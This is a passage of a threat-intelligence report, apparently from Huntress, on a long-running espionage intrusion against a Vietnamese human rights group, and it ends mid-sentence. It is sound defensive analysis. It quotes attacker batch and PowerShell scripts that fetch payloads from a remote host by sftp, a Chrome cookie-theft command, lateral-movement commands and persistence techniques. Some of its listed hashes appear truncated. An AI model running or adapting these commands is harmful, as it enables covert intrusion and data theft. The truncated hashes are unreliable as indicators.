{ "id": "8e4583cd-f495-4d65-81bd-0603ffc600b3", "created_at": "2026-04-06T02:11:34.617921Z", "updated_at": "2026-04-10T03:36:22.192755Z", "deleted_at": null, "sha1_hash": "852cbe8c6c47d67b263065f52eb34b409d2a4f7a", "title": "Advanced Persistent Threat Targeting Vietnamese Human Rights Defenders", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10423781, "plain_text": "Advanced Persistent Threat Targeting Vietnamese Human Rights\r\nDefenders\r\nBy Jai Minton, Craig Sweeney\r\nPublished: 2024-08-28 · Archived: 2026-04-06 02:06:47 UTC\r\nExecutive Summary\r\nIt doesn’t matter if you’re a small organization, a non-profit, or a Fortune 500 company, there’s always someone who will\r\nwant access to your information. In many instances, this access is primarily for financial gain; however, for many non-profits and small organizations the harsh reality is that the nature of their work, or their clients, also makes them an ideal\r\ntarget for intelligence gathering and espionage-motivated threat actors. \r\nThreat hunters at Huntress recently discovered an intrusion on a Vietnamese human rights defender’s machine which is\r\nsuspected to have been ongoing for at least four years. This intrusion has a number of overlaps with known techniques used\r\nby the threat actor APT32/OceanLotus, and a known target demographic which aligns with APT32/OceanLotus targets. This\r\npost highlights just how far advanced threats will go for information gathering purposes when it aligns with their strategic\r\ninterests.\r\nBackground\r\nHuntress regularly performs threat hunting operations to find intrusions that may have slipped past normal security defenses.\r\nIn a recent case, Huntress analysts identified an intrusion against a non-profit supporting Vietnamese human rights which\r\nhas likely spanned the course of at least four years. While detections in the Huntress platform found some anomalous\r\nactivity which was reported to the Huntress partner, the threat hunting team was able to find well-hidden persistence, and\r\nactions taken by the threat actor. This information was then used to piece the intrusion together and trace it back long before\r\nthe Huntress agent was deployed. \r\nHunting Methodology\r\nHuntress is uniquely positioned to look for threat actors across millions of systems. This comes through the combination of\r\nprocess behavior insights and persistent footholds gathered from the Huntress EDR. Leveraging process behavior insights,\r\nthreat hunters use intelligence, or a hypothesis, and their knowledge of what is normal on a system to create threat hunting\r\nrules. These rules differ from product detections as they are generally higher in frequency, and lower in efficacy given they\r\ntarget techniques used by threat actors who are trying to blend into an environment. Using created hunting rules, threat\r\nhunters often take three different approaches to threat hunting including looking for: rare hunting signals, multiple signal\r\nclusters, and statistical anomalies.\r\nThe Huntress Managed EDR consistently identifies persistent footholds on a system. This allows threat hunters to locate\r\nanomalies where a persistent foothold may be found on a small subset of the systems protected by Huntress. These\r\nanomalies could be a difference in persistence mechanism, name, binary, or another attribute to what is normally seen across\r\nother Huntress partner environments. Whilst investigating a new hunting signal, it was found that a system would\r\ninfrequently and inconsistently run a small number of administrative commands from an unusual process. \r\nThe admin commands run were deliberate and rarely exceeded three commands in a ten minute period, with a max of twelve\r\nbeing run on a system during any given day. Despite this, the unusual activity was enough to raise the attention of Huntress\r\nthreat hunters who proceeded to look over persistent footholds in the partner environment and piece together the larger scale\r\nof this intrusion.\r\nInvestigation and Analysis\r\nHost 1\r\nPersistence Mechanisms\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 1 of 29\n\nFigure 1: Diagram of Persistence Mechanisms on host 1\r\nWhile onboarding to Huntress, host 1 presented with a scheduled task titled Adobe Flash Updater:\r\nScheduled Task 1\r\nTask Path: Adobe Flash Updater\r\nExecutable: c:\\windows\\system32\\wscript.exe\r\nArguments: /Nologo /E:VBScript C:\\ProgramData\\AppData\\Roaming\\Adobe\\Updater\\scheduler\\scheduler.ps1:log.txt\r\nThe referenced scheduler.ps1:log.txt, is an alternate data stream named log.txt within a file named scheduler.ps1. This file\r\nwas already removed prior to the Huntress agent being deployed; however, the naming convention and use of an alternate\r\ndata stream has some overlap with public reporting by Cybereason detailing a VBS and PowerShell-based loader used to\r\nload Metasploit and Cobalt Strike payloads.\r\nIn the following weeks, new scheduled tasks were created on the host and identified by the Huntress agent roughly 10 days\r\napart:\r\nScheduled Task 2\r\nTask Path: AdobeUpdateTaskUser\u003cSID\u003e\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Java\\bin\\javaw.exe\r\nArguments: -jar C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Adobe\\Acrobat\\adobe.jar mi54giwp\r\nThis scheduled task referenced a malicious Java Archive (JAR) file which was specifically created for the user and system in\r\nquestion. The malware contained a hard-coded reference to a file C:\\Users\\\r\n\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\Acrobat\\adobe.png which contained potentially encrypted shellcode or configuration\r\nthat was to be loaded by an embedded DLL within the Java Archive named mi54giwp.dll . The above scheduled task was\r\nsubsequently interactively launched by the threat actor using the native Windows schtasks.exe executable:\r\nschtasks /run /TN \"AdobeUpdateTaskUser\u003cSID\u003e\"\r\nScheduled Task 3\r\nTask Path: WinDefenderAntivirusUpdateTaskUser\u003cSID2\u003eCore\r\nExecutable: wscript\r\nArguments: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\MSSharePoint.vbs\r\nThis scheduled task contained a different user SID than the one found in the AdobeUpdateTaskUser scheduled task. The\r\nMSSharePoint.vbs script was designed to use a private key already placed on disk, authenticate to a remote SFTP server,\r\nand download / run a script called cloud.bat.\r\nThe cloud.bat file used the same private key to authenticate to the same remote SFTP server, and pulled down a file called\r\ncloudlog.txt.\r\n@echo off\r\nset user=MSSHAREUTHVBA\r\nset destination_folder=%AppData%\\Microsoft\\Windows\\CloudStore\\\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 2 of 29\n\nset sftpath=sftp.exe\r\nset vbs=%destination_folder%MSSharePoint.vbs\r\nif exist \"%windir%\\System32\\OpenSSH\\sftp.exe\" (\r\ngoto upload\r\n) else (\r\nset sftpath=%destination_folder%%sftpath%\r\ngoto upload\r\n)\r\n: upload\r\n%sftpath% -P 6291 -o StrictHostKeyChecking=no -i %destination_folder%id_rsa\r\n%user%@base.msteamsapi.com:/%user%/cloudlog.txt %destination_folder\r\nAt the time of investigation there was no cloudlog.txt file on disk. Modification timestamps on the private key, SFTP, and\r\nSSH binaries all indicate that they were possibly present since November 2023.\r\nLess than a day later, schtasks.exe was used to create persistence that would run cloud.batonce every 5 hours.\r\nschtasks /create /sc minute /mo 300 /tn\r\nHandler{60396-307392-03497-03790-3702046} /tr\r\n\"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\cloud.bat\" /f\r\nScheduled Task 4\r\nTask Path: Handler{60396-307392-03497-03790-3702046}\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\cloud.bat\r\nCreation of the Handler scheduled task was later found to have originated from a DllHost surrogate process which was\r\nexecuting a DLL from a COM object stored in the registry with the identifier {1F7CFAF8-B558-4EBD-9526-\r\n203135A79B1D}.\r\nParent Process: C:\\WINDOWS\\SysWOW64\\DllHost.exe /Processid:{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nProcess: cmd /c schtasks /create /sc minute /mo 300 /tn\r\nHandler{60396-307392-03497-03790-3702046} /tr\r\n\"%AppData%\\Microsoft\\Windows\\CloudStore\\cloud.bat\" /f\r\nIt was found that this process was being launched from another scheduled task that was previously setup prior to Huntress\r\ndeployment.\r\nScheduled Task 5\r\nTask Path: UpdateLibrary_{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nDescription: This task updates the cached list of folders and the security permissions on any new files in a user’s shared\r\nmedia library.\r\nCOM Handler: {1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nTask File Creation Date: 2020-06-04\r\nThis task attempted to masquerade as the legitimate UpdateLibrary task on the system and had an identical description to\r\nthe legitimate UpdateLibrary scheduled task also on the system. The task creation and modification timestamps indicate it\r\nwas first set up in June of 2020. The StartBoundary within the XML file used for this Scheduled Task also had a timestamp\r\nvalue of 2020-01-01T00:00:00 indicating that the task was expected to be run from the start of 2020 onwards.\r\nAlthough the scheduled task didn’t have an executable set to run, it did have a COM Handler that was to be invoked.\r\nAnalysis of the host found a COM object setup using registry keys.\r\nCOM Object\r\nPurpose: Specify that DllHost.exe would run as the surrogate process for a given application\r\nRegistry Key: HKU\\\u003cSID\u003e\\Software\\Classes\\AppID\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 3 of 29\n\nRegistry Entry Value: DllSurrogate\r\nRegistry Entry Data: 0\r\nPurpose: Correlate application identifier with its COM object identifier\r\nRegistry Key: HKU\\\u003cSID\u003e\\Software\\Classes\\WOW6432Node\\CLSID\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nRegistry Entry Value: AppID\r\nRegistry Entry Data: {1F7CFAF8-B558-4EBD-9526-203135A79B1D}\r\nPurpose: Specify the server DLL to be executed by the COM object identifier\r\nRegistry Key: HKU\\\u003cSID\u003e\\Software\\Classes\\WOW6432Node\\CLSID\\{1F7CFAF8-B558-4EBD-9526-\r\n203135A79B1D}\\InProcServer32\r\nRegistry Entry Value: (Default)\r\nRegistry Entry Data: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-\r\n203135A79B1D}\\cachuri.dll\r\nThis COM object DLL set to run was a signed, legitimate iisutil.dll used by IIS Express, which happened to match a rule\r\ncreated by Florian Roth from Nextron systems 5 years ago called APT_OceanLotus_ISSUTIL_Sep18. Although this\r\nmatch was a false positive, a malicious sample was found on VirusTotal matching this rule, which was submitted with the\r\nnames iisutil.dll and iisutil2.dll.\r\nThis sample has been flagged by some AV engines as being tied to APT32/OceanLotus and has significant overlap with\r\nanother DLL found on disk called iisutil2.dll. Further analysis of the DLL and 2 other files, which together act as a\r\nbackdoor, are presented in the section: \"Analysis of Malware.\"\r\nFigure 2: Classification of OceanLotus on VirusTotal\r\nA few weeks following the creation of these scheduled tasks, an enumeration command was observed on the host looking\r\nfor current user’s privileges. \r\nwhoami /priv\r\nThe next day, a forced restart was performed on a remote host. This same action was performed on another system roughly\r\ntwo weeks following execution on the first.\r\ncmd /c shutdown /r /m \\\\\u003cremote ip\u003e /t 0 /f\r\nWe don’t know the intent of this action, but speculate it may have been to ensure execution of malware on a remote system\r\nor to ensure any system configuration changes are applied.\r\nOver the next few months, various discovery commands were performed to ensure access to remote workstations from host\r\n1. Actions were taken to ensure network connectivity was still active on the host and remote hosts.\r\nnet view \\\\\u003cremote ip\u003e /all\r\nnet use \\\\\u003cremote ip\u003e /u:\"\u003cdomain\u003e\\\u003cuser\u003e\" \"\u003cpassword\u003e\"\r\nnetstat -ano\r\nipconfig /all\r\nA run key was found on host 1 which referenced a McAfee OEM Module binary (mcoemcpy.exe) masquerading as\r\nWdiServiceHost. A DLL used for sideloading was not found at the time of investigation; however, public reporting by\r\nESET is available which states that this executable is vulnerable to loading a malicious DLL named McUtil.dll.\r\nRun Key 1\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 4 of 29\n\nPurpose: Launch an executable known to be vulnerable to DLL Sideloading when user logs in\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Entry Value: WdiServiceHost\r\nRegistry Entry Data: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\WdiServiceHost_339453944\\WdiServiceHost.exe\r\nA second run key was found on host 1 referencing an Apple Software binary (SoftwareUpdate.exe) with a revoked code\r\nsignature. This persistence mechanism was unique across Huntress customers and it’s believed this was used to sideload a\r\nmalicious DLL. The DLL used for sideloading was not found at the time of investigation; however, public reporting by\r\nRecorded Future is available which states that this executable is vulnerable to loading a malicious DLL\r\nnamedSoftwareUpdateFilesLocalized.dll.\r\nRun Key 2\r\nPurpose: Launch an executable known to be vulnerable to DLL Sideloading when user logs in\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Entry Value: Apple Software Update Cache\r\nRegistry Entry Data: C:\\ProgramData\\Apple\\Installer Cache\\SoftwareUpdate.exe\r\nYet another run key was found on host 1 referencing a batch script called connection.bat. This had identical functionality to\r\nMSSharePoint.vbs except it launched PowerShell to run SFTP rather than a VBS script.\r\nRun Key 3\r\nPurpose: Launch a batch script when user logs in\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry Entry Value: ChromeUptodate\r\nRegistry Entry Data: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\connection.bat\r\n@echo off\r\npowershell -WindowStyle Hidden -executionpolicy bypass -Command \"Start-Process -WindowStyle Hidden -\r\nFilePath sftp.exe -ArgumentList '-P','6291','-o','StrictHostKeyChecking=no', '-i', 'C:\\Users\\\r\n\u003cRedacted\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\id_rsa\r\nMSSHAREUTHVBA@base.msteamsapi.com:/MSSHAREUTHVBA/cloud.bat', 'C:\\Users\\\r\n\u003cRedacted\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\'\"\r\nRight before isolation occurred on this system, the threat actor was seen attempting to steal Google Chrome cookies for all\r\nuser profiles on the system from the DllHost COM object backdoor.\r\ncmd /c for /f \"tokens=*\" %G in ('dir /b \"%localappdata%\\Google\\Chrome\\User\r\n Data\\Profile *\"') do copy \"%localappdata%\\Google\\Chrome\\User\r\n Data\\%G\\Network\\Cookies.bak\" \"%localappdata%\\Google\\Chrome\\User\r\nData\\%G\\Cookies\" /y\r\nHost 2\r\nPersistence Mechanism\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 5 of 29\n\nFigure 3: View of Persistence Mechanism on host 2\r\nA separate host, host 2, had remote commands run via Windows Management Instrumentation to execute a batch script\r\napproximately 1.5 months after the first observed action on host 1. This batch script was used to query processes running on\r\nthe host.\r\ncmd.exe /c C:\\Users\\Public\\Downloads\\1.bat\r\nThe batch script content is below:\r\nwmic process get name, executablepath, sessionid, processid \u003e C:\\Users\\Public\\Downloads\\1.txt\r\nDomain Discovery commands were also observed on this system shortly after this.\r\nnet group \"Domain Admins\" /domain\r\nnltest /dclist:\u003cREDACTED\u003e.local\r\nThe process which initiated this was a legitimate version of the calibre eBook management executable calibre.exe which\r\nhad been setup to run as a task. Through Huntress telemetry, it was seen that a Scheduled Task was attempted to be created\r\nto run this calibre.exe executable from an unusual location.\r\nschtasks /create /sc MINUTE /mo 300 /tn\r\n \"Microsoft\\Windows\\WindowsColorSystem\\Calibration_Update\" /tr\r\n \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\Calibre.exe\r\n\" /f\r\nScheduled Task 1\r\nTask Path: Microsoft\\Windows\\WindowsColorSystem\\Calibration_Update\r\nExecutable:   C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\Calibre.exe\r\nIt should be noted that this is an attempt to blend in to the legitimate “Calibration Loader” task generally seen at\r\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader. We speculate that the\r\n“Calibration Loader” task was chosen because of similar naming as the file calibre.exe.\r\nSoon after this execution there was attempted privilege escalation via named pipes performed through the calibre process.\r\nThis likely involved injection into the legitimate Windows gpupdate.exe process, which is a known process commonly\r\ninjected into through the use of malleable Cobalt Strike profiles and is commonly seen when running the ‘getsystem’\r\ncommand from Cobalt Strike.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 6 of 29\n\nGrandparent:\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\r\nParent:\r\nC:\\windows\\sysnative\\gpupdate.exe\r\nProcess:\r\nC:\\Windows\\system32\\cmd.exe /c echo a0e3d8a67d0 \u003e \\\\.\\pipe\\a64009\r\nAnalysis of this host found the calibre executable running a malicious DLL called calibre-launcher.dll on disk; however,\r\nwithin a matter of minutes before the DLL and executable could be obtained the threat actor seemed to have killed the\r\nrunning process, removed the entire SPMigration directory including the implant. At the time of investigation, there was a\r\nsuspicious entry still in the system DNS cache:\r\nIP DNS Entries\r\n91.231.182[.]18 kpi.msccloudapp[.]com\r\nAlthough we weren’t able to confirm that this lookup was related to the intrusion in question, the domain was similar to one\r\nseen previously (msteamsapi[.]com) and the subdomain also had overlap with a subdomain seen on host 4.\r\nHost 3\r\nPersistence Mechanism\r\nFigure 4: View of Persistence Mechanism on host 3\r\nShortly after performing named pipe impersonation on host 2, a command was run using the same Cobalt Strike beacon in\r\nan attempt to create a scheduled task on a third system. This scheduled task was set to run every 15 minutes as the SYSTEM\r\nuser account (Note: the task name resembles a license key and as such has been redacted as a precaution).\r\nschtasks.exe /u \"\u003cREDACTED\u003e\\\u003cREDACTED\u003e\" /p \"\u003cREDACTED\u003e\" /S\r\n \u003cREDACTED\u003e /create /SC MINUTE /MO 15 /TN \"\u003cREDACTED\u003e\" /TR\r\n \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\"\r\n/RU \"NT AUTHORITY\\SYSTEM\" /K /f\r\nScheduled Task 1\r\nTask Path: \u003cREDACTED\u003e\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 7 of 29\n\nShortly after this, a command was run to invoke the calibre executable.\r\nwmic /node:\u003cREDACTED\u003e /user:\u003cREDACTED\u003e /password:\u003cREDACTED\u003e\r\nprocess call create \"cmd.exe /c start\r\nc:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\"\r\nAt the time of investigation, the executable and DLL weren’t found on disk.\r\nHost 4\r\nPersistence Mechanisms\r\nFigure 5: Diagram of Persistence Mechanisms on host 4\r\nUsing available Huntress telemetry, a search was run to find any other instances where the calibre executable was set to run\r\nat startup. Three scheduled tasks were found on the system, two of which were masquerading as legitimate Adobe\r\nexecutables, with the other masquerading as a Microsoft update task.\r\nScheduled Task 1\r\nTask Path: Adobe Acrobat Update Task\r\nExecutable: C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\r\nScheduled Task 2\r\nTask Path: MicrosoftOne\\Uptodate\r\nExecutable: C:\\programdata\\Microsoft\\AppV\\ins-findstr.exe\r\nScheduled Task 3\r\nTask Path: Adobe Acrobat Update Task_v2\r\nExecutable: C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeUpdate.exe\r\nAnalysis of network connections on the system showed that one of the calibre executables posing as Adobe\r\n(AdobeARM.exe) previously had a network connection to a remote IP address.\r\nIP DNS Entries\r\n51.81.29[.]44 kpi.adcconnect[.]me\r\nBased on analysis of this infrastructure and malicious calibre-loader.dll files submitted to VirusTotal, this IP address and\r\nthe calibre.exe implant were likely tied to a Cobalt Strike Team Server. \r\nMonths after our initial detection on host 1, user privilege discovery was observed via a different calibre.exe process.\r\nwhoami /priv\r\nWeeks following this command we observed a new service created to run a legitimate node executable. This executable was\r\nset to launch a malicious Node addon binary to evade detection on the system.\r\nService 1\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 8 of 29\n\nName: Adobe_Reader\r\nExecutable: C:\\programdata\\adobe\\node.exe\r\nArguments: -e require('C:\\ProgramData\\adobe\\1lpiozkc.node')\r\nThe Node addon was created to specifically target the system and user account and included a hardcoded path to a file on\r\ndisk at C:\\Programdata\\Adobe\\ms-adobe.bin. This also included a hardcoded service name to be created called\r\nSrvAdobeUpd; however, at the time of investigation, this wasn’t found on the system. Analysis of network connections on\r\nthe system showed that this node executable previously connected to a remote IP address.\r\nIP DNS Entries\r\n5.230.35[.]192\r\ndupleanalytics[.]net\r\nget.dupbleanalytics[.]net\r\nBased on analysis of this infrastructure and the malicious node file, it’s believed that this was likely tied to a Cobalt Strike\r\nTeam Server.\r\nAbout a month following the Node addon being launched we observed a scheduled task creation spawning from the\r\nnode.exe process.\r\nParent Process:\r\nC:\\programdata\\adobe\\node.exe -e require('C:\\\\ProgramData\\\\adobe\\\\1lpiozkc.node')\r\nProcess:\r\nC:\\WINDOWS\\system32\\cmd.exe /C schtasks /create /sc MINUTE /mo 15 /tn\r\n\"96d09a49-98ed-4b12-936a-c8715d2d2c0e\" /tr\r\n\"C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\bin\\javaw.exe -jar\r\nC:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar zfhqq01v\" /f\r\nThis scheduled task was set to run a jar file which would run an embedded DLL into memory. \r\nScheduled Task 4\r\nTask Name: 96d09a49-98ed-4b12-936a-c8715d2d2c0e\r\nExecutable: C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\bin\\javaw.exe\r\nArguments: -jar C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar zfhqq01v)\r\nFurther analysis on msadobe.jar is mentioned in the following section.\r\nSupporting Analysis\r\nIt’s most likely that this is only the tip of the iceberg and that the true extent of this intrusion stretches well beyond systems\r\nwith the Huntress agent. Preliminary analysis was conducted into the malware found on these systems, and infrastructure\r\nused in the intrusion. This was done as a way of determining any known overlap with threat actor techniques which align\r\nwith the target industry or demographic of the victim organization.\r\nAnalysis of Malware\r\nThis intrusion had several binaries and files which were involved. A summary of these files are included below.\r\nLocation Hash (SHA256)\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\\r\n{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\cachuri.dll\r\naa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft\r\nCompatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\cachuri.dllaa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights\r\nPolicy Template Management (Automated)\\{2A918D97-CCFE-4BE6-\r\nAB0E-D56A2E3F503D}\\cachuri.dll\r\naa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft\r\nCompatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\iisexpressshim.sdb09f53e68e55a38c3e989841f59a9c4738c34c308e569d23315fd0e2341195\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\\r\n{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\iisexpressshim.sdb\r\n09f53e68e55a38c3e989841f59a9c4738c34c308e569d23315fd0e2341195\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 9 of 29\n\nLocation Hash (SHA256)\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights\r\nPolicy Template Management (Automated)\\{2A918D97-CCFE-4BE6-\r\nAB0E-D56A2E3F503D}\\iisexpressshim.sdb\r\na217fe01b34479c71d3a7a524cb3857809e575cd223d2dd6666cdd47bd28\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\\r\n{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\iisutil2.dll\r\n47af8a33aac2e70ab6491a4c0a94fd7840ff8014ad43b441d01bfaf9bf6c4a\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\\r\n{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\logo.png\r\n82e94417a4c4a6a0be843ddc60f5e595733ed99bbfed6ac508a5ac6d4dd31\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft\r\nCompatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\logo.pngf8773628cdeb821bd7a1c7235bb855e9b41aa808fed1510418a7461f7b82\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights\r\nPolicy Template Management (Automated)\\{2A918D97-CCFE-4BE6-\r\nAB0E-D56A2E3F503D}\\logo.png\r\naa69c6c22f1931d90032a2d825dbee266954fac33f16c6f9ce7714e012404\r\nC:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\r\n735e7b33b97bff3cf6416ed3b8ed7213d7258eec05202cbf8f8f8002c6435f\r\nC:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre-launcher.dllUnknown\r\nC:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar 300ef93872cc574024f2402b5b899c834908a0c7da70477a3aeeaee2e458a\r\nzfhqq01v.dll (inside msadobe.jar) 6719175208cb6d630cf0307f31e41e0e0308988c57772f25494c9d2a2b84\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Adobe\\Acrobat\\adobe.jar efc373b0cda3f426d25085938cd02b7344098e773037a70404c6028c76cc\r\nmi54giwp.dll (inside adobe.jar) a79ced63bdf0ea69d84153b926450cf3119bdea4426476b37dfde2a48a6ed\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Adobe\\Acrobat\\adobe.png a6072e7b0fafb5f09fd02c37328091abfede86c7c8cb802852985a37147bfa\r\nC:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msreader.bin Unknown\r\nC:\\ProgramData\\adobe\\ms-adobe.bin 8e2e9e7b93f4ed67377f7b9df9523c695f1d7e768c3301db6c653948766ff\r\nC:\\ProgramData\\adobe\\1lpiozkc.node b31bfa8782cb691178081d6685d8429a2a2787b1130c6620d3486b4c3e02\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\\r\n{02594FE8-1152-E41E-A75E-923494C7B453}\\DropboxUpdate.bin\r\nc7e2dbc3df04554daa19ef125bc07a6fa52b5ea0ba010f187a082dc9fc2e97\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\\r\n{02594FE8-1152-E41E-A75E-923494C7B453}\\DropboxUpdate.exe\r\n47839789332aaf8861f7731bf2d3fbb5e0991ea0d0b457bb4c8c1784f76c7\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\\r\n{02594FE8-1152-E41E-A75E-923494C7B453}\\goopdate.dll\r\nc03cc808b64645455aba526be1ea018242fcd39278acbbf5ec3df544f9cf95\r\nDuring analysis of host 1, it was found that the legitimate cachuri.dll set to run as a COM object would explicitly import\r\nand run code from iisutil2.dll. Although iisutil2.dll had almost identical information as a signed, valid copy of iisutil.dll,\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 10 of 29\n\nthis had been patched to run different code, and was modified to increase the file size above 50MB. It’s believed this was\r\ndone to evade a number of YARA rules which often have file size constraints, and to prevent submitting the file to online\r\nsandboxing tools, many which have a file size limit of 50MB. This modification caused notable differences in the NT\r\nHeader, Optional Header, and most significantly the .text section.\r\nFigure 6: View of .text section of iisutil2.dll compared with a legitimate version\r\nThe entry point of this DLL had also been modified to offset 0x00025FB0 (155568) which differed from the original entry\r\npoint of 0x00027FB0 (163760). A brief analysis of this binary showed it pushed the return address to the stack and then ran\r\na function at 0x1002711e.\r\nFigure 7: Disassembly: View of call to function at 0x1002711e\r\nThis is significant because these operations, the entry point, and the address of the function to be run are all identical to the\r\npreviously mentioned malware submitted to VirusTotal which is tied to APT32/OceanLotus. A closer inspection showed that\r\nthis file was actually identical to the sample on VirusTotal tied to OceanLotus mentioned earlier, with the only difference\r\nbeing data appended to it so that its file size grew above 50MB.\r\nFigure 8: Comparison view of the newly found binary to a known binary from VirusTotal\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 11 of 29\n\nIn contrast, the legitimate DLL would begin setting up necessary registers before having a branch condition depending on\r\nthe arguments passed to the executable running the DLL.\r\nFigure 9: Disassembly of the legitimate iisutil2.dll binary \r\nThe malicious DLL would then search the Process Environment Block (PEB) for a PEB_LDR_DATA structure so that it can\r\nidentify the InLoadOrderModuleList. This structure contains a list of DLLs in the order that they were loaded.\r\nFigure 10: Disassembly: Searching for the DllBase in one of the lists of loaded DLLs\r\nThe code includes multiple jump operations, such as the one shown in Figure 10, which would never be taken, or would\r\nonly be used to run a small amount of instructions, before returning to the original flow of execution.\r\nFigure 11: Disassembly: Getting the pointer to the buffer of the first module\r\nInterestingly, this malware contains a number of garbage op-codes and control flow obfuscation to throw off-static analysis\r\nand break disassembly. This overlaps with techniques known to be used by APT32/OceanLotus as previously 